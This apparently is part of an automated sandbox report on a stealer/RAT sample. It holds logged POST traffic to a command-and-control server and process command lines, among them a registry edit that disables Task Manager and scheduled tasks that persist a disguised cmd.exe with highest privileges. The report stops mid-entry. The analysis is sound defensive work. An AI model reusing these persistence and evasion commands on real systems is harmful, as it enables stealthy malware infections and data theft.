                                                                                                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 31 39 3a 34 38 3a 35 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 32 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 09 1e 26 11 24 35 38 56 24 06 3c 09 25 2a 2d 0e 2b 5a 3f 43 2c 32 27 03 36 3a 09 55 2a 33 24 5b 3e 2f 33 02 22 3f 29 09 36 06 22 00 2a 3a 23 5b 03 1d 21 01 20 31 2e 13 25 29 31 10 2c 0e 2b 1c 31 3e 26 07 28 2d 36 0e 23 3d 3a 53 36 3e 1d 0f 2c 23 07 5a 30 02 23 10 2b 3d 08 1e 24 15 21 51 00 10 39 12 24 1d 3d 5c 25 3f 39 07 25 5b [TRUNCATED]
                                                                                                                                  Data Ascii: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 19:48:56 GMTServer: Apache/2.4.41 (Ubuntu)Vary: Accept-EncodingContent-Length: 152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8&$58V$<%*-+Z?C,2'6:U*3$[>/3"?)6"*:#[! 1.%)1,+1>&(-6#=:S6>,#Z0#+=$!Q9$=\%?9%[)0%'!%(!,1 T%2<53>62"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  84192.168.2.450093193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:55.959898949 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:56.311072111 CET2560OUTData Raw: 5a 52 59 5a 59 47 5a 56 5a 5c 55 51 59 5f 54 51 56 51 5d 40 50 56 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZRYZYGZVZ\UQY_TQVQ]@PVZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)0'>=Y&Q*%?<+>#T(>P&!W*X9> $;T?'_!%Y)#
                                                                                                                                  Jan 3, 2025 20:48:56.598861933 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:56.726963043 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:56 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  85192.168.2.450094193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:56.861624002 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:57.217320919 CET2560OUTData Raw: 5f 56 59 5f 5c 41 5a 5b 5a 5c 55 51 59 56 54 51 56 5d 5d 44 50 55 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _VY_\AZ[Z\UQYVTQV]]DPUZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F?3$&-=]%4=[%/4<7Q('%1R)#.%: <-'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:57.530221939 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:57.666150093 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:57 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  86192.168.2.450095193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:57.950536013 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:58.295054913 CET2560OUTData Raw: 5a 51 5c 5b 59 45 5a 55 5a 5c 55 51 59 56 54 50 56 5e 5d 40 50 51 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZQ\[YEZUZ\UQYVTPV^]@PQZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%A(3#]$.2%!1<'+-+*V$-)(#4-5Y4Q )-'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:58.687091112 CET232INHTTP/1.1 100 Continue
                                                                                                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 31 39 3a 34 38 3a 35 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 3b 56 5f 56
                                                                                                                                  Data Ascii: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 19:48:58 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 4Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  87192.168.2.450096193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:58.812931061 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:59.170186996 CET2560OUTData Raw: 5f 55 59 59 59 43 5a 56 5a 5c 55 51 59 58 54 5b 56 5d 5d 42 50 53 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _UYYYCZVZ\UQYXT[V]]BPSZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%<0'Y3)2$)%4?<<*$>>*37Z,&&"'(-'_!%Y)?
                                                                                                                                  Jan 3, 2025 20:48:59.436980009 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:59.568761110 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:59 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  88192.168.2.450097193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:59.714607954 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:49:00.060363054 CET2560OUTData Raw: 5f 52 5c 58 5c 44 5a 5b 5a 5c 55 51 59 5a 54 50 56 59 5d 46 50 50 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _R\X\DZ[Z\UQYZTPVY]FPPZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)##01>2<3?P(:2U) #:&)Y74;+-'_!%Y)7
                                                                                                                                  Jan 3, 2025 20:49:00.383277893 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:49:00.524929047 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:49:00 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  89192.168.2.450098193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:49:01.572736025 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1860
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  90192.168.2.450099193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:49:01.613631964 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2552
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:49:01.966613054 CET2552OUTData Raw: 5f 53 5c 53 5c 47 5a 57 5a 5c 55 51 59 5e 54 50 56 5c 5d 45 50 5c 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _S\S\GZWZ\UQY^TPV\]EP\Z_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%< ;3=*1*'?3+=<4:Q2>6*#$-59"'?+'_!%Y)+
                                                                                                                                  Jan 3, 2025 20:49:02.322532892 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:49:02.453272104 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:49:02 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  91192.168.2.450100193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:49:02.579777956 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:49:02.935344934 CET2560OUTData Raw: 5a 56 5c 53 59 4a 5f 51 5a 5c 55 51 59 5b 54 54 56 5b 5d 44 50 54 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZV\SYJ_QZ\UQY[TTV[]DPTZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(<'-*%762,]+.(+4"&W>(-%^ $?+='_!%Y)3
                                                                                                                                  Jan 3, 2025 20:49:03.218236923 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:49:03.348541021 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:49:03 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  92192.168.2.450101193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:49:03.468750000 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:49:03.826119900 CET2560OUTData Raw: 5f 56 5c 5f 5c 40 5a 52 5a 5c 55 51 59 59 54 52 56 50 5d 41 50 53 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _V\_\@ZRZ\UQYYTRVP]APSZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+ 3*27.%<<X?-U+B*$=!W=#X."44??'_!%Y)
                                                                                                                                  Jan 3, 2025 20:49:04.189882994 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:49:04.324601889 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:49:04 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Click to jump to process

                                                                                                                                  Click to jump to process

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Click to jump to process

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:14:46:56
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Users\user\Desktop\kJrNOFEGbQ.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\kJrNOFEGbQ.exe"
                                                                                                                                  Imagebase:0x360000
                                                                                                                                  File size:4'234'106 bytes
                                                                                                                                  MD5 hash:36BBAFBD00E62A37070764EB4ED93308
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1661222491.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1660775907.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:1
                                                                                                                                  Start time:14:46:57
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe"
                                                                                                                                  Imagebase:0x1e0000
                                                                                                                                  File size:147'456 bytes
                                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:14:47:25
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" "
                                                                                                                                  Imagebase:0x240000
                                                                                                                                  File size:236'544 bytes
                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:14:47:25
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:14:47:26
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                                                                  Imagebase:0xbf0000
                                                                                                                                  File size:59'392 bytes
                                                                                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:14:47:26
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\hyperComponentFontDhcp/Mscommon.exe"
                                                                                                                                  Imagebase:0x5c0000
                                                                                                                                  File size:3'680'256 bytes
                                                                                                                                  MD5 hash:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1951066729.00000000005C2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.2010012696.0000000012E0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\hyperComponentFontDhcp\Mscommon.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperComponentFontDhcp\Mscommon.exe, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 83%, ReversingLabs
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:14:47:29
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:14:47:29
                                                                                                                                  Start date:03/01/2025
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f
                                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                                  File size:235'008 bytes
                                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:14:47:29
